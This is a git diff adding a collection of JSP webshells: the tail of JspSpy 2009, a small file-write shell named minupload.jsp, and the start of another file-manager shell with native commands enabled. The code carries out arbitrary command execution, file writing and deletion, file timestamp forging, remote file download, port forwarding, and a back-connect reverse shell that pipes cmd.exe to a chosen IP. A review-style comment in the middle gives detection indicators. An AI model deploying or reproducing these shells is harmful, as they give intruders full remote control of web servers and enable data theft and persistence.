    "); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); + +BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +String execute = ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); + +out.println("
    "+ +"
    "+ +"

    Set File Property »

    "+ +"

    Current file (fullpath)

    "+ +" "+ +"

    Read: "+ +" "+ +" Write: "+ +" "+ +" Execute: "+ +" "+ +"

    "+ +"

    Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; + +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); + +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) cmd = "cmd.exe /c set"; +if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
    "+ +"
    "+ +"

    Execute Program »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "+ +"

    Execute Shell »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +ins.get("vs").invoke(request,response,JSession); +out.println("

    "); +out.println("
    ");
    +String command = request.getParameter("command");
    +if (!Util.isEmpty(command)) {
    +Process pro = Runtime.getRuntime().exec(command);
    +BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
    +String s = reader.readLine();
    +while (s != null) {
    +out.println(Util.htmlEncode(Util.getStr(s)));
    +s = reader.readLine();
    +}
    +reader.close();
    +out.println("
    "); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +ins.get("vs").invoke(request,response,JSession); +} +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +File f = new File(path); +if (!f.exists()) +return; +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.baidu.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
    "+ +"
    "+ +"

    Remote File DownLoad »

    "+ +"

    "+ +""+ +"Remote File URL:"+ +" "+ +"Save Path:"+ +""+ +""+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +ins.get("vd").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +ins.get("filelist").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); 
+} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MoveInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String src = request.getParameter("src"); +String target = request.getParameter("to"); +if (!Util.isEmpty(target) && !Util.isEmpty(src)) { +File file = new File(src); +if(file.renameTo(new File(target))) { +JSession.setAttribute(MSG,"Move File Success!"); +} else { +String msg = "Move File Failed!"; +if (file.isDirectory()) { +msg += "The Move Will Failed When The Directory Is Not Empty."; +} +JSession.setAttribute(MSG,msg); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class RemoteDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String dir = request.getParameter("dir"); +File file = new File(dir); +if (file.exists()) { +deleteFile(file); +deleteDir(file); +} + +JSession.setAttribute(MSG,"Remove Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +public void deleteFile(File f) { +if (f.isFile()) { +f.delete(); +}else { +File[] list = f.listFiles(); +for (File ff:list) { +deleteFile(ff); +} +} +} +public void deleteDir(File f) { +File[] list = f.listFiles(); +if (list.length == 0) { +f.delete(); +} else { +for (File ff:list) { +deleteDir(ff); +} +deleteDir(f); +} +} +} +private static class PackBatchInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void 
invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (Util.isEmpty(files)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String[] arr = files.split(","); +for (String f:arr) { +File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); +ZipEntry entry = new ZipEntry(pF.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(pF); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +zout.close(); +JSession.setAttribute(MSG,"Pack Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String base = ""; +if 
(pF.isDirectory()) { +zipDir(pF,base,zout); +} else { +zipFile(pF,base,zout); +} +zout.close(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +File[] arr = f.listFiles(); +for (File ff:arr) { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) +tmpBase += "/"; +zipDir(ff,tmpBase+f.getName(),zout); +} +} else { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) +tmpBase += "/"; +zipFile(f,tmpBase,zout); +} +} +public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream 
output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"Unzip File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); + +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); + +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.baidu.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); + +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    PortMap >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Local Ip :"+ +" "+ +" Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

    "+ +" "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +ins.get("vmp").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); 
+remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +this.readFromLocal(localIn,remoteOut); +this.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} +public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +response.sendRedirect(SHELL_NAME+"?o=vmp"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); 
+JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "4444"; +if (Util.isEmpty(program)) +program = "cmd.exe"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    Back Connect >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

    "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +response.sendRedirect(SHELL_NAME+"?o=vbc"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

    System Properties >>

    "+ +"
    "+ +"
    "+ +"
      "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
    • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
    • "); +} +out.println("

    System Environment >>


      "); +Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
    • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
    • "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
    Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Remote Control | "+ +" Port Map | "+ +" JSP Env "+ +"
    "); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "); +out.println("

    Shell OnLine »


    "); +out.println("
    "+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ +"
    "+ +"
    "+ +" "+ +"
    "+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
    "+ +" " +); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+Charset.defaultCharset().name()); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//?????? 
+Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vRemoteControl",new VRemoteControlInvoker()); +ins.put("gc",new GcInvoker()); +ins.put("vPortScan",new VPortScanInvoker()); +ins.put("portScan",new PortScanInvoker()); +ins.put("vConn",new VConnInvoker()); +ins.put("dbc",new DbcInvoker()); +ins.put("executesql",new ExecuteSQLInvoker()); +ins.put("vLogin",new VLoginInvoker()); +ins.put("login",new LoginInvoker()); +ins.put("filelist", new FileListInvoker()); +ins.put("logout",new LogoutInvoker()); +ins.put("upload",new UploadInvoker()); +ins.put("copy",new CopyInvoker()); +ins.put("bottom",new BottomInvoker()); +ins.put("vCreateFile",new VCreateFileInvoker()); +ins.put("vEdit",new VEditInvoker()); +ins.put("createFile",new CreateFileInvoker()); +ins.put("vEditProperty",new VEditPropertyInvoker()); +ins.put("editProperty",new EditPropertyInvoker()); +ins.put("vs",new VsInvoker()); +ins.put("shell",new ShellInvoker()); +ins.put("down",new DownInvoker()); +ins.put("vd",new VdInvoker()); +ins.put("downRemote",new DownRemoteInvoker()); +ins.put("index",new IndexInvoker()); +ins.put("mkdir",new MkDirInvoker()); +ins.put("move",new MoveInvoker()); +ins.put("removedir",new RemoteDirInvoker()); +ins.put("packBatch",new PackBatchInvoker()); +ins.put("pack",new PackInvoker()); +ins.put("unpack",new UnPackInvoker()); 
+ins.put("vmp",new VmpInvoker()); +ins.put("vbc",new VbcInvoker()); +ins.put("backConnect",new BackConnectInvoker()); +ins.put("jspEnv",new JspEnvInvoker()); +ins.put("smp",new SmpInvoker()); +ins.put("mapPort",new MapPortInvoker()); +ins.put("top",new TopInvoker()); +ins.put("vso",new VOnLineShellInvoker()); +ins.put("online",new OnLineInvoker()); +} +%> +<% +try { +String o = request.getParameter("o"); +if (!Util.isEmpty(o)) { +Invoker in = ins.get(o); +if (in == null) { +response.sendRedirect(SHELL_NAME+"?o=index"); +} else { +if (in.doBefore()) { +String path = request.getParameter("folder"); +if (!Util.isEmpty(path)) +session.setAttribute(CURRENT_DIR,path); +ins.get("before").invoke(request,response,session); +ins.get("script").invoke(request,response,session); +ins.get("top").invoke(request,response,session); +} +in.invoke(request,response,session); +if (!in.doAfter()) { +return; +}else{ +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +} +} else { +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +e.printStackTrace(new PrintStream(bout)); +session.setAttribute(CURRENT_DIR,SHELL_DIR); +Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
    "),"left"); +bout.close(); +out.flush(); +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +%> diff --git a/jsp/hackk8/JSP/minupload.jsp b/jsp/hackk8/JSP/minupload.jsp new file mode 100644 index 0000000..3994c00 --- /dev/null +++ b/jsp/hackk8/JSP/minupload.jsp @@ -0,0 +1,48 @@ + + <%@page contentType="text/html;charset=utf-8"%> + <%@page import="java.io.*,java.util.*,java.net.*"%> + + + JspDo Code By Xiao.3 + + + + <% + if(request.getParameter("context")!=null) + { //这小马有问题 上传jsp就出错 + String context=new String(request.getParameter("context").getBytes("ISO-8859-1"),"utf-8"); + String path=new String(request.getParameter("path").getBytes("ISO-8859-1"),"utf-8"); + OutputStream pt = null; + try { + pt = new FileOutputStream(path); + pt.write(context.getBytes()); + out.println("上传成功!"); + } catch (FileNotFoundException ex2) { + out.println("上传失败!"); + } catch (IOException ex) { + out.println("上传失败!"); + } finally { + try { + pt.close(); + } catch (IOException ex3) { + out.println("上传失败!"); + } + } + } + %> +
    + 本文件的路径:<%out.print(request.getRealPath(request.getServletPath())); %> +
    +
    + 上传文件路径:"> +
    +
    + 上传文件内容: +
    +
    + +
    + + \ No newline at end of file diff --git a/jsp/hackk8/JSP/other/download.jsp b/jsp/hackk8/JSP/other/download.jsp new file mode 100644 index 0000000..85c73d1 --- /dev/null +++ b/jsp/hackk8/JSP/other/download.jsp 
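Review bot: The scriptlet in minupload.jsp passes `request.getParameter("path")` straight to `new FileOutputStream(path)` and writes `request.getParameter("context")` into it, with no authentication and no check that the resolved target stays under a fixed base directory, and nothing in the file marks it as a malware sample. The page also prints `request.getRealPath(request.getServletPath())`, which discloses the server-side filesystem layout to any visitor. Since the file is archived as a specimen, I would add a header comment such as `<%-- MALWARE SAMPLE (file-write webshell): writes request parameter "context" to the server path in "path"; for detection research only, never deploy --%>` so it cannot be mistaken for an upload utility. For defenders, the static indicator is a request parameter flowing unmodified into a `FileOutputStream` path inside a JSP, and the runtime indicator is the application-server process creating new `.jsp` files under the web root. The HTML form markup appears to have been lost in this rendering, so the rest of the page could not be reviewed.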
@@ -0,0 +1,1913 @@ +<%@page import="java.util.*, + java.net.*, + java.text.*, + java.util.zip.*, + java.io.*" +%> +<%! + //FEATURES + private static final boolean NATIVE_COMMANDS = true; + /** + *If true, all operations (besides upload and native commands) + *which change something on the file system are permitted + */ + private static final boolean READ_ONLY = false; + //If true, uploads are allowed even if READ_ONLY = true + private static final boolean ALLOW_UPLOAD = true; + + //Allow browsing and file manipulation only in certain directories + private static final boolean RESTRICT_BROWSING = false; + //If true, the user is allowed to browse only in RESTRICT_PATH, + //if false, the user is allowed to browse all directories besides RESTRICT_PATH + private static final boolean RESTRICT_WHITELIST = false; + //Paths, sperated by semicolon + //private static final String RESTRICT_PATH = "C:\\CODE;E:\\"; //Win32: Case important!! + private static final String RESTRICT_PATH = "/etc;/var"; + + //The refresh time in seconds of the upload monitor window + private static final int UPLOAD_MONITOR_REFRESH = 2; + //The number of colums for the edit field + private static 